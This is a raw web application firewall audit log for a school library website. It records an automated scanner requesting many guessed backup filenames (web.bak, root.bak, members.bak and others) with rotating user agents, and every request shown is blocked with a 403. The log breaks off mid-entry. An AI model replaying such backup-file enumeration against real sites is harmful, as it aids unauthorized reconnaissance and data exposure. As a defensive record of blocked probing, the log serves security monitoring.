[18/May/2025:11:50:56 +0700] aClnMEPRqak7bVuUS6cStAAAAJE 103.236.140.4 56674 103.236.140.4 8181 --316f7120-B-- GET /web.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626 Safari/537.36 OPR/56.0.3051.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117360828 --316f7120-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --316f7120-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856252129 4427 (- - -) Stopwatch2: 1747543856252129 4427; combined=940, p1=488, p2=409, p3=0, p4=0, p5=42, sr=100, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --316f7120-Z-- --3adbec56-A-- [18/May/2025:11:50:56 +0700] aClnMPypzAd0elWOk7o8ewAAABg 103.236.140.4 55596 103.236.140.4 8181 --3adbec56-B-- GET /root.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729 Safari/537.36 OPR/57.0.3098.106 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155975683 --3adbec56-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3adbec56-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856254117 5262 (- - -) Stopwatch2: 1747543856254117 5262; combined=1848, p1=457, p2=1357, p3=0, p4=0, p5=34, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3adbec56-Z-- --99666b2d-A-- [18/May/2025:11:50:56 +0700] aClnMFewLfDrCkDGIGxd3QAAAM0 103.236.140.4 56708 103.236.140.4 8181 --99666b2d-B-- GET /smkn22jakarta.sch.id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.137 Safari/537.36 OPR/50.0.2762.67 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151060495 --99666b2d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --99666b2d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".sch.id.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856253495 8137 (- - -) Stopwatch2: 1747543856253495 8137; combined=1151, p1=681, p2=438, p3=0, p4=0, p5=31, sr=126, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99666b2d-Z-- --d0642c5d-A-- [18/May/2025:11:50:56 +0700] aClnMEPRqak7bVuUS6cStwAAAJU 103.236.140.4 56736 103.236.140.4 8181 --d0642c5d-B-- GET /back.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36 OPR/54.0.2952.60 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151420937 --d0642c5d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d0642c5d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856254833 11722 (- - -) Stopwatch2: 1747543856254833 11722; combined=1224, p1=798, p2=388, p3=0, p4=0, p5=37, sr=485, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0642c5d-Z-- --f8fedb72-A-- [18/May/2025:11:50:56 +0700] aClnMFewLfDrCkDGIGxd2gAAAMY 103.236.140.4 56702 103.236.140.4 8181 --f8fedb72-B-- GET /2017.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155713548 --f8fedb72-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f8fedb72-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856253478 13269 (- - -) Stopwatch2: 1747543856253478 13269; combined=6842, p1=418, p2=6388, p3=0, p4=0, p5=36, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8fedb72-Z-- --a26d330c-A-- [18/May/2025:11:50:56 +0700] aClnMBir-GlPrFVVKe5EwQAAAEA 103.236.140.4 56738 103.236.140.4 8181 --a26d330c-B-- GET /faisunzip.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 OPR/56.0.3051.52 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 83165205 --a26d330c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a26d330c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856257522 9395 (- - -) Stopwatch2: 1747543856257522 9395; combined=769, p1=457, p2=275, p3=0, p4=0, p5=36, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a26d330c-Z-- --9e53ec14-A-- [18/May/2025:11:50:56 +0700] aClnMPypzAd0elWOk7o8gQAAAAQ 103.236.140.4 53908 103.236.140.4 8181 --9e53ec14-B-- GET /user.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0 Safari/537.36 OPR/58.0.3135.127 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152961036 --9e53ec14-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9e53ec14-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856259369 7677 (- - -) Stopwatch2: 1747543856259369 7677; combined=917, p1=442, p2=444, p3=0, p4=0, p5=31, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e53ec14-Z-- --a331fc6f-A-- [18/May/2025:11:50:56 +0700] aClnMEPRqak7bVuUS6cSswAAAII 103.236.140.4 56198 103.236.140.4 8181 --a331fc6f-B-- GET /smkn22jakarta.sch.id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 OPR/56.0.3051.43 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 154337292 --a331fc6f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a331fc6f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".sch.id.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856249349 17858 (- - -) Stopwatch2: 1747543856249349 17858; combined=8237, p1=466, p2=492, p3=0, p4=0, p5=7278, sr=109, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a331fc6f-Z-- --19683864-A-- [18/May/2025:11:50:56 +0700] aClnMFewLfDrCkDGIGxd4gAAANg 103.236.140.4 54330 103.236.140.4 8181 --19683864-B-- GET /members.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1; rv:60.2.0) Gecko/20100101 Firefox/60.2.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153485324 --19683864-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --19683864-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856245182 22218 (- - -) Stopwatch2: 1747543856245182 22218; combined=909, p1=444, p2=432, p3=0, p4=0, p5=33, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19683864-Z-- --4382530c-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8hQAAAAM 103.236.140.4 56796 103.236.140.4 8181 --4382530c-B-- GET /backups.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 156303368 --4382530c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4382530c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882077320 2592 (- - -) Stopwatch2: 1747543882077320 2592; combined=907, p1=426, p2=450, p3=0, p4=0, p5=31, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4382530c-Z-- --77a6854e-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8hwAAABU 103.236.140.4 56796 103.236.140.4 8181 --77a6854e-B-- GET /clients.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 156303378 --77a6854e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --77a6854e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882094488 2892 (- - -) Stopwatch2: 1747543882094488 2892; combined=964, p1=465, p2=468, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77a6854e-Z-- --9f0ac449-A-- [18/May/2025:11:51:22 +0700] aClnShir-GlPrFVVKe5ExwAAAE8 103.236.140.4 56832 103.236.140.4 8181 --9f0ac449-B-- GET /home.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36 OPR/55.0.2994.47 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153190418 --9f0ac449-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9f0ac449-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882097383 2007 (- - -) Stopwatch2: 1747543882097383 2007; combined=767, p1=359, p2=381, p3=0, p4=0, p5=26, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f0ac449-Z-- --1a02bc78-A-- [18/May/2025:11:51:22 +0700] aClnShir-GlPrFVVKe5EygAAAFY 103.236.140.4 56832 103.236.140.4 8181 --1a02bc78-B-- GET /1.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0.3) Gecko/20100101 Firefox/59.0.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153190460 --1a02bc78-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1a02bc78-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882138075 1986 (- - -) Stopwatch2: 1747543882138075 1986; combined=735, p1=372, p2=336, p3=0, p4=0, p5=27, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a02bc78-Z-- --969e7579-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8jAAAAAA 103.236.140.4 56796 103.236.140.4 8181 --969e7579-B-- GET /local.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224344 --969e7579-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --969e7579-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882139036 1835 (- - -) Stopwatch2: 1747543882139036 1835; combined=712, p1=328, p2=357, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --969e7579-Z-- --e9a09f7e-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8jQAAAAQ 103.236.140.4 56796 103.236.140.4 8181 --e9a09f7e-B-- GET /aspx.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5; rv:52.6.0) Gecko/20100101 Firefox/52.6.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117609561 --e9a09f7e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e9a09f7e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882144300 1580 (- - -) Stopwatch2: 1747543882144300 1580; combined=648, p1=321, p2=300, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9a09f7e-Z-- --b1ffcd38-A-- [18/May/2025:11:51:22 +0700] aClnShir-GlPrFVVKe5EzQAAAFA 103.236.140.4 56832 103.236.140.4 8181 --b1ffcd38-B-- GET /engine.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.1805 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117609566 --b1ffcd38-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b1ffcd38-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882146903 1817 (- - -) Stopwatch2: 1747543882146903 1817; combined=806, p1=331, p2=445, p3=0, p4=0, p5=29, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1ffcd38-Z-- --19a8c83e-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8kAAAAA4 103.236.140.4 56796 103.236.140.4 8181 --19a8c83e-B-- GET /jsp.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 OPR/53.0.2907.99 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 70090845 --19a8c83e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --19a8c83e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file 